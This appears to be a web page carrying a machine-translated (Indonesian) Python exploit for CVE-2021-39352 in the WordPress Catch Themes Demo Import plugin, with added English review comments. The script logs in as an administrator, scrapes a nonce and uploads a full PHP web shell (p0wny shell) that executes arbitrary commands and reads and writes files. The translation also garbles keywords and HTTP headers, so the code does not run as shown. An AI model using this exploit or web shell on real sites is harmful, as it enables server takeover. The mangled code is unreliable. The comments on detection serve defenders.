WordPress Catch Themes Demo Impor 1.6.1 Unggah Shell



# Judul Eksploitasi: Plugin WordPress Catch Themes Demo Import 1.6.1 – Eksekusi Kode Jarak Jauh (RCE) (Diotentikasi)
# Tanggal 07.12.2021
# Penulis Eksploitasi: Ron Jost (Hacker5preme)
# Beranda Vendor: https://wordpress.org/plugins/catch-themes-demo-import/
# Tautan Perangkat Lunak: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip
# Versi: <= 1.6.1
# Diuji pada: Ubuntu 18.04
# CVE: CVE-2021-39352
# CWE: CWE-434
# Dokumentasi: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md

'''
Keterangan:
Plugin Catch Themes Demo Import WordPress rentan terhadap unggahan file sewenang-wenang melalui fungsi impor
yang ditemukan di file ~/inc/CatchThemesDemoImport.php, dalam versi hingga 1.7,
karena validasi jenis file yang tidak memadai. Ini memungkinkan penyerang dengan hak administratif untuk mengunggah
file berbahaya yang dapat digunakan untuk mencapai eksekusi kode jarak jauh.
'''

# Banner: ASCII art spelling the CVE id, printed once at start-up.
# The text inside the string is part of the program output and is left as pasted.
spanduk = “””
____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
|| C ||| V ||| E ||| – ||| 2 ||| 0 ||| 2 ||| 1 ||| – ||| 3 ||| 9 ||| 9 ||| 3 ||| 5 ||| 2 ||
||__|||__|||__|||__|||__||__|||__|||__|||__||__|||__|||__||| __|||__||
|/__|/__|/__|/__|/__|/__|/__|/__|/__|/__|/__|/__|/ __|/__|

[+] Tangkap Tema Demo Impor RCE (Diotentikasi)
[@] Dikembangkan oleh Ron Jost (Hacker5preme)

“””
# `cetak` is a machine-translated print(); see the note on the argument block below.
cetak (spanduk)

impor argparse
permintaan impor
dari datetime impor datetime

# User input:
# Command-line arguments: target host and port, the WordPress base path, and an
# administrator username/password pair. The header above classifies the issue as
# authenticated, and the script never attempts anything without these credentials.
#
# NOTE(review): this listing is machine-translated and does not parse as Python as
# pasted — keywords and identifiers such as `impor`, `cetak`/`mencetak`, `ketik=`,
# `nama pengguna` and `kata sandi` are Indonesian renderings, and the quote
# characters are typographic. It is kept byte-for-byte; only comments are added.
my_parser = argparse.ArgumentParser(description=’Wordpress Plugin Catch Themes Demo Impor – RCE (Diotentikasi)’)
my_parser.add_argument(‘-T’, ‘–IP’, type=str)
my_parser.add_argument(‘-P’, ‘–PORT’, type=str)
my_parser.add_argument(‘-U’, ‘–PATH’, type=str)
my_parser.add_argument(‘-u’, ‘–USERNAME’, type=str)
my_parser.add_argument(‘-p’, ‘–PASSWORD’, ketik=str)
args = my_parser.parse_args()
# All five options are optional in argparse terms; a missing one yields None and
# later string concatenation would raise TypeError rather than a clear usage error.
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
nama pengguna = args.USERNAME
kata sandi = args.PASSWORD
mencetak(”)
# Timestamp of the run, printed as HH:MM:SS.
mencetak(‘[*] Mulai Eksploitasi pada: ‘ + str(datetime.now().strftime(‘%H:%M:%S’)))
mencetak(”)

# Authentication:
# Log in through the ordinary wp-login.php form inside a requests session so the
# resulting cookies are reused by the later requests. From a log-review standpoint
# this stage is indistinguishable from a normal administrator login, followed by a
# GET of the plugin's admin page (themes.php?page=catch-themes-demo-import).
sesi = permintaan.Sesi()
auth_url=”http://” + target_ip + ‘:’ + target_port + wp_path + ‘wp-login.php’
# Initial GET of the login page; the response object is never read, only the
# cookies it sets (if any) are kept in the session.
periksa = session.get(auth_url)
# Headers:
# NOTE(review): several header names and values below are machine-translated
# ('Terima' for Accept, 'Jenis Konten' for Content-Type, 'tutup' for close), so as
# pasted this dict does not reproduce the request headers the author intended.
kepala = {
‘Host’: target_ip,
‘User-Agent’: ‘Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0’,
‘Terima’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’,
‘Bahasa Terima’: ‘de, en-US; q = 0,7, en; q = 0,3’,
‘Terima-Encoding’: ‘gzip, deflate’,
‘Jenis Konten’: ‘aplikasi/x-www-form-urlencoded’,
‘Asal’: ‘http://’ + target_ip,
‘Koneksi’: ‘tutup’,
‘Permintaan-Upgrade-Tidak Aman’: ‘1’
}

# Body:
# Form fields of the standard WordPress login form (`log` and `pwd` carry the
# credentials). The other two keys are also mangled by translation.
tubuh = {
‘log’: nama pengguna,
‘pwd’: kata sandi,
‘wp-kirim’: ‘Masuk’,
‘kuki tes’: ‘1’
}
# The login response is stored but never inspected: a failed login is not
# detected here and the script proceeds regardless.
auth = session.post(auth_url, headers=header, data=body)

# Get the security nonce value:
# The plugin's admin page embeds an `ajax_nonce` value; it is cut out of the raw
# HTML by plain string search rather than by parsing.
periksa = session.get(‘http://’ + target_ip + ‘:’ + target_port + wp_path+ ‘wp-admin/themes.php?page=catch-themes-demo-import’).text
# `+ 13` skips the 11-character marker plus two more characters — presumably the
# `:"` preceding the value; this assumes a fixed HTML layout that is not checked.
# If the marker is absent (e.g. login failed or the plugin is not installed),
# find() returns -1 and the slice silently yields a meaningless string instead
# of raising.
nonce = cek[check.find(‘ajax_nonce”‘) + 13:]
wp_nonce = nonce[:nonce.find(‘”‘)]
cetak (wp_nonce)

# Exploit:
# The upload goes to WordPress's admin-ajax.php. The multipart body assigned further
# down carries the plugin action `ctdi_import_demo_data` and a `content_file` part
# whose filename ends in .php — that combination (an admin-ajax.php POST with this
# action and a PHP attachment) is the concrete CWE-434 condition the plugin's
# file-type validation failed to reject, and the request shape a detection rule
# or WAF signature for this CVE should key on.
exploit_url=”http://” + target_ip + ‘:’ + target_port + wp_path + ‘wp-admin/admin-ajax.php’

# Headers (exploit):
# Hand-built multipart/form-data request with a fixed boundary string.
# NOTE(review): as with the login headers, several names here are translated
# ('Menerima', 'Perujuk', 'X-Diminta-Dengan', 'Asal', 'Koneksi') and would not be
# sent under their real HTTP names as pasted.
kepala = {
“User-Agent”: “Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0”,
“Menerima”: “*/*”,
“Bahasa Terima”: “de, en-US; q = 0,7, en; q = 0,3”,
“Accept-Encoding”: “gzip, deflate”,
# Inconsistent with the rest of the script: the Referer hard-codes `/wordpress/`
# and omits the port instead of being built from wp_path and target_port.
‘Perujuk’: ‘http://’ + target_ip + ‘/wordpress/wp-admin/themes.php?page=catch-themes-demo-import’,
“X-Diminta-Dengan”: “XMLHttpRequest”,
“Content-Type”: “multipart/form-data; boundary=—————————121585879226594965303252407916”,
“Asal”: “http://” + target_ip,
“Koneksi”: “tutup”
}

# Eksploitasi Payload (Menggunakan p0wny shell: https://github.com/flozz/p0wny-shell):
shell_payload = “——————121585879226594965303252407916rnContent-Disposition: form-data; name=”action “rnrnctdi_import_demo_datarn—————————–121585879226594965303252407916rnDisposisi Konten: form-data; name=”keamanan”rnrn” + wp_nonce + “rn———————- ——-121585879226594965303252407916rnContent-Disposition: form-data; name=”selected”rnrnundefinedrn———— —————–121585879226594965303252407916rnContent-Disposition: form-data; name=”content_file”; filename=”shell.php”rnContent -Tipe: application/x-phprnrn&1)?$/”, $cmd)) {n chdir($cwd);n preg_match(“/^\s*cd\s+([^\s]+)\s*(2>&1)?$/”, $cmd, $match);n chdir($match[1]);n } elseif (preg_match(“/^\s*download\s+[^\s]+\s*(2>&1)?$/”, $cmd)) {n chdir($cwd);n preg_match(“/^\s*download\s+([^\s]+)\s*(2>&1)?$/”, $cmd, $match);n mengembalikan fiturDownload($match[1]);n } else {n chdir($cwd);n exec($cmd, $stdout);n }nn mengembalikan array(n “stdout” => $stdout,n “cwd” => getcwd()n );n}nnfungsi featurePwd() {n return array(“cwd” => getcwd());n}nnfungsi featureHint ($fileName, $cwd, $type) {n chdir($cwd);n if ($type == ‘cmd’) {n $cmd = “compgen -c $fileName”;n } else {n $cmd = “compgen -f $fileName”;n }n $cmd = “/bin/bash -c \”$cmd\””;n $file = meledak(“\n”, shell_exec($cmd));n mengembalikan array(n ‘file’ => $file,n );n}nnfungsi fiturDownload($filePath) { n $file = @file_get_contents($filePath);n if ($file === FALSE) {n return array(n ‘stdout’ => array(‘File tidak ditemukan / tidak ada izin baca.’), n ‘cwd’ => getcwd()n );n } else {n return array(n ‘name’ => basename($filePath),n ‘file’ => base64_encode($file) n );n }n}nnfungsi featureUpload($path, $file, $cwd) {n chdir($cwd);n $f = @fopen($path, ‘wb’); n if ($f === FALSE) {n return array(n ‘stdout’ => array(‘Jalur tidak valid / tidak ada izin menulis .’),n ‘cwd’ => getcwd()n );n } else {n fwrite($f, base64_decode($file));n fclose($f);n return array( n ‘stdout’ => array(‘Selesai.’),n ‘cwd’ => getcwd()n );n }n}nnif (isset($_GET[“feature”])) {nn $respons = NULL;nn beralih ($_GET[“feature”]) {n case 
“shell”:n $cmd = $_POST[‘cmd’];n if (!preg_match(‘/2>/’, $cmd)) {n $cmd .= ‘ 2>&1’;n }n $respons = featureShell($cmd, $_POST[“cwd”]);n break;n case “pwd”:n $response = featurePwd();n break;n case “hint”:n $response = featureHint($_POST[‘filename’], $_POST[‘cwd’], $_POST[‘type’]);n break;n case ‘upload’:n $respons = featureUpload($_POST[‘path’], $_POST[‘file’], $_POST[‘cwd’]);n }nn header(“Jenis Konten: application/json”);n echo json_encode($response);n die();n}nn?>nnnn n n [email protected]:~#n n